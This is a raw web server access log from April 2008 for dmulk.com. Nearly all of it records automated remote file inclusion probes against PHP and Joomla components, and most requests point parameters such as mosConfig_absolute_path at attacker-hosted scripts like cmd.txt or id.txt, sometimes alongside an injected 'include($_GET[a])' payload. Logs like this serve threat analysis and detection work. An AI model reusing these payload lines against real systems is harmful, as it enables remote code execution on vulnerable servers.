86.109.167.35 - - [23/Apr/2008:11:28:54 -0700] "GET /logs/access_080218.log/////?mosConfig_absolute_path=http://www.animacartoon.altervista.org/cartella03/324235/index.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [23/Apr/2008:11:28:57 -0700] "GET /////?mosConfig_absolute_path=http://www.animacartoon.altervista.org/cartella03/324235/index.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
86.109.167.35 - - [23/Apr/2008:11:28:58 -0700] "GET /logs/////?mosConfig_absolute_path=http://www.animacartoon.altervista.org/cartella03/324235/index.txt? HTTP/1.1" 200 44418 "-" "libwww-perl/5.79" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:29:06 -0700] "GET /logs/access.log/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:29:06 -0700] "GET /errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:29:06 -0700] "GET /logs/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.216.249.194 - - [23/Apr/2008:11:29:24 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:29:25 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:29:26 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:29:26 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:29:37 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:30:02 -0700] "GET /logs/access_080306.log/errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:30:08 -0700] "GET /errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:30:08 -0700] "GET /logs/errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:30:16 -0700] "GET /logs/access_080306.log/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.223.101.14 - - [23/Apr/2008:11:30:29 -0700] "GET /logs/access_080115.log//config.inc.php?path_escape=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.101.14 - - [23/Apr/2008:11:30:29 -0700] "GET //config.inc.php?path_escape=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.223.101.14 - - [23/Apr/2008:11:30:29 -0700] "GET /logs//config.inc.php?path_escape=http://rusrezina.ru/pr/data/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:30:34 -0700] "GET /errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:30:44 -0700] "GET /logs/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [23/Apr/2008:11:30:49 -0700] "GET //?mosConfig_absolute_path=http://lunk.110mb.com/img.jpg? HTTP/1.1" 200 11602 "-" "libwww-perl/5.805" "dmulk.com"
88.165.38.69 - - [23/Apr/2008:11:30:50 -0700] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.troop66nm.org/image/response1?? HTTP/1.0" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
88.165.38.69 - - [23/Apr/2008:11:30:50 -0700] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.troop66nm.org/image/response1?? HTTP/1.0" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:30:56 -0700] "GET /logs/access_080214.log/?mosConfig_absolute_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:30:57 -0700] "GET /?mosConfig_absolute_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:31:05 -0700] "GET /logs/access_080306.log/errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:31:07 -0700] "GET /logs/?mosConfig_absolute_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.810" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:31:12 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:31:16 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:31:17 -0700] "GET /logs/access_080306.log/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:31:18 -0700] "GET /errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:31:21 -0700] "GET /logs/access_080306.log/errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:31:21 -0700] "GET /errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:31:22 -0700] "GET /logs/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:31:23 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:31:28 -0700] "GET /logs/errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:31:37 -0700] "GET /errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [23/Apr/2008:11:31:47 -0700] "GET /logs/errors.php?error=http://need-this.info/pretty/234/control/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
41.220.75.3 - - [23/Apr/2008:11:31:49 -0700] "GET /logs/access_070912.log HTTP/1.1" 200 65147 "http://www.alexa.com/search?q_orig=%2B974+yahoo.com&q_quotes=@&count=20&q_pipe=&q_minus=scam%2C419%2Cwebmaster&lang=&type_option=&type=plain&occur=&site=&dmoz=&adult=maybe&traffic=&advs=y" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
89.218.85.18 - - [23/Apr/2008:11:32:06 -0700] "GET //?mosConfig_absolute_path=http://lunk.110mb.com/img.jpg? HTTP/1.1" 200 11602 "-" "libwww-perl/5.805" "dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:32:27 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:32:27 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [23/Apr/2008:11:32:32 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:11:33:40 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:11:33:52 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:11:34:08 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:11:34:11 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [23/Apr/2008:11:34:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.ppxp.ru/images/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Apr/2008:11:34:20 -0700] "GET //?mosConfig_absolute_path=http://lunk.110mb.com/img.jpg? HTTP/1.1" 200 11602 "-" "libwww-perl/5.805" "dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:34:34 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.19.158.41 - - [23/Apr/2008:11:34:43 -0700] "GET //common/db.php?commonpath=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:35:04 -0700] "GET /logs/access_080201.log/modules/My_eGallery/index.php?basepath=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:35:04 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.228.117.2 - - [23/Apr/2008:11:35:52 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.franciscobeu.com/help/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:36:11 -0700] "GET /logs//main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:36:12 -0700] "GET //main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
206.53.51.242 - - [23/Apr/2008:11:36:43 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.53.51.242 - - [23/Apr/2008:11:36:43 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:37:12 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:37:12 -0700] "GET //main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:37:13 -0700] "GET /logs//main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
206.53.51.242 - - [23/Apr/2008:11:37:19 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [23/Apr/2008:11:37:50 -0700] "GET //?mosConfig_absolute_path=http://lunk.110mb.com/img.jpg? HTTP/1.1" 200 11602 "-" "libwww-perl/5.805" "dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:37:59 -0700] "GET //main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:38:12 -0700] "GET /logs/access.log/view.php?sub=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:38:13 -0700] "GET /view.php?sub=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:38:13 -0700] "GET /logs/view.php?sub=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.227 - - [23/Apr/2008:11:38:37 -0700] "GET /logs/access_070826.log HTTP/1.0" 200 50531 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:38:47 -0700] "GET /logs//main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:38:48 -0700] "GET //main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
211.114.53.153 - - [23/Apr/2008:11:39:27 -0700] "GET /logs/access_071219.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_simpleboard&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://filipsen.nl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:39:37 -0700] "GET /logs/access_080329.log//main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:39:38 -0700] "GET //main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:39:39 -0700] "GET /logs//main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:11:39:43 -0700] "GET /logs/access_080306.log/errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:11:39:49 -0700] "GET /errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:11:39:50 -0700] "GET /logs/errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:39:53 -0700] "GET /logs/access.log/view.php?sub=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:39:53 -0700] "GET /view.php?sub=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:39:54 -0700] "GET /logs/view.php?sub=http://216.120.252.101/~beogor/news/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.171.122 - - [23/Apr/2008:11:40:24 -0700] "GET /logs/access.log/index.php?Sayfa=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.171.122 - - [23/Apr/2008:11:40:27 -0700] "GET /index.php?Sayfa=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.171.122 - - [23/Apr/2008:11:40:27 -0700] "GET /logs/index.php?Sayfa=http://www.x-code.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:11:40:29 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:40:33 -0700] "GET /logs/access_080225.log//main.php?sayfa=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.253.132.5 - - [23/Apr/2008:11:42:11 -0700] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "dmulk.com"
87.253.132.5 - - [23/Apr/2008:11:42:11 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "dmulk.com"
87.253.132.5 - - [23/Apr/2008:11:42:12 -0700] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "dmulk.com"
87.253.132.5 - - [23/Apr/2008:11:42:12 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.walex.ch/templates/madeyourweb/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:43:51 -0700] "GET /logs/access_080309.log/?thisdir=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:43:54 -0700] "GET /?thisdir=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 11606 "-" "libwww-perl/5.810" "www.dmulk.com"
217.168.112.1 - - [23/Apr/2008:11:44:03 -0700] "GET /logs/?thisdir=http://www.spacecolonization.net/2080/pafiledb/images/screenshots/lake.jpg????? HTTP/1.1" 200 44410 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:44:13 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:11:45:15 -0700] "GET /logs/access_080302.log//components/com_simpleboard/file_upload.php?sbp=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:11:45:16 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [23/Apr/2008:11:45:16 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.casadaserra.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:45:36 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:45:37 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.198 - - [23/Apr/2008:11:45:37 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.quotationsforlife.com/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.195.123.29 - - [23/Apr/2008:11:46:14 -0700] "GET /logs/phphtml.php?htmlclass_path=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "www.dmulk.com"
85.195.123.22 - - [23/Apr/2008:11:46:14 -0700] "GET /phphtml.php?htmlclass_path=http://keirafans.net/img/test.txt????????????????????????? HTTP/1.0" 404 275 "-" "http://Anonymouse.org/ (Unix)" "www.dmulk.com"
74.85.40.150 - - [23/Apr/2008:11:46:28 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.85.40.150 - - [23/Apr/2008:11:46:32 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
74.85.40.150 - - [23/Apr/2008:11:46:32 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:11:47:01 -0700] "GET /logs/access.log/errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:11:47:02 -0700] "GET /errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.47.219.34 - - [23/Apr/2008:11:47:02 -0700] "GET /logs/errors.php?error=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:11:47:33 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
200.93.147.155 - - [23/Apr/2008:11:47:35 -0700] "GET /logs/index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:48:25 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://elgolfobuceo.com/media/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:48:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://elgolfobuceo.com/media/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [23/Apr/2008:11:48:28 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://elgolfobuceo.com/media/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.9.83.84 - - [23/Apr/2008:11:48:37 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.54.129.234 - - [23/Apr/2008:11:48:54 -0700] "GET /logs/access_080218.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://statesidelogistics.com/images/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
99.238.107.156 - - [23/Apr/2008:11:49:18 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.104.101.246 - - [23/Apr/2008:11:49:18 -0700] "GET /index2.php?mosConfig_absolute_path=http://www.sustainaqua.org//rspn.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
205.234.193.164 - - [23/Apr/2008:11:50:01 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
